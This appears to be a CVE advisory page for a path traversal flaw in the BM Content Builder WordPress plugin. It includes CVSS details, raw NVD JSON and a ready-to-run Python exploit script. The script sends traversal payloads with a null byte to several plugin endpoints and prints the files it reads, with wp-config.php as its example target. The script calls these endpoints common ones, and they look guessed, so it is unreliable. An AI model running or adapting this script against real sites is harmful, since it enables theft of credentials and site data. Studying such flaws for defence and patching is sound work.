Security Vulnerability Report
中文
CVE-2025-69055 CVSS 6.5 MEDIUM

CVE-2025-69055

Published: 2026-01-22 17:16:19
Last Modified: 2026-04-15 00:35:42

Description

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in SeaTheme BM Content Builder bm-builder allows Path Traversal.This issue affects BM Content Builder: from n/a through < 3.16.3.3.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

BM Content Builder < 3.16.3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-69055 Path Traversal PoC # Target: WordPress BM Content Builder plugin < 3.16.3.3 def exploit_path_traversal(target_url, file_path): """ Exploit path traversal vulnerability to read arbitrary files """ # Common vulnerable endpoints for BM Builder endpoints = [ '/wp-content/plugins/bm-builder/includes/ajax.php?action=bm_builder_download', '/wp-content/plugins/bm-builder/public/ajax.php', '/wp-content/plugins/bm-builder/assets/download.php' ] # Payload construction with path traversal traversal = '../../../../' + file_path + '%00' for endpoint in endpoints: try: params = { 'file': traversal, 'filename': file_path.split('/')[-1] } response = requests.get(target_url + endpoint, params=params, timeout=10) if response.status_code == 200 and len(response.content) > 0: print(f'[+] Successfully exploited: {endpoint}') print(f'[+] File content preview:') print(response.text[:500]) return True except requests.RequestException as e: print(f'[-] Error testing {endpoint}: {e}') return False if __name__ == '__main__': if len(sys.argv) < 3: print('Usage: python cve-2025-69055.py <target_url> <file_path>') print('Example: python cve-2025-69055.py http://target.com ../../wp-config.php') sys.exit(1) target = sys.argv[1].rstrip('/') file_path = sys.argv[2] print(f'[*] Target: {target}') print(f'[*] Attempting to read: {file_path}') exploit_path_traversal(target, file_path)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69055", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:19.140", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in SeaTheme BM Content Builder bm-builder allows Path Traversal.This issue affects BM Content Builder: from n/a through < 3.16.3.3."}, {"lang": "es", "value": "Vulnerabilidad de Limitación Inadecuada de un Nombre de Ruta a un Directorio Restringido ('Salto de Ruta') en SeaTheme BM Content Builder bm-builder permite Salto de Ruta. Este problema afecta a BM Content Builder: desde n/a hasta &lt;= 3.16.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/bm-builder/vulnerability/wordpress-bm-content-builder-plugin-3-16-3-arbitrary-file-download-vulnerability?_s_id=cve", "source": "[email protected]"}]}}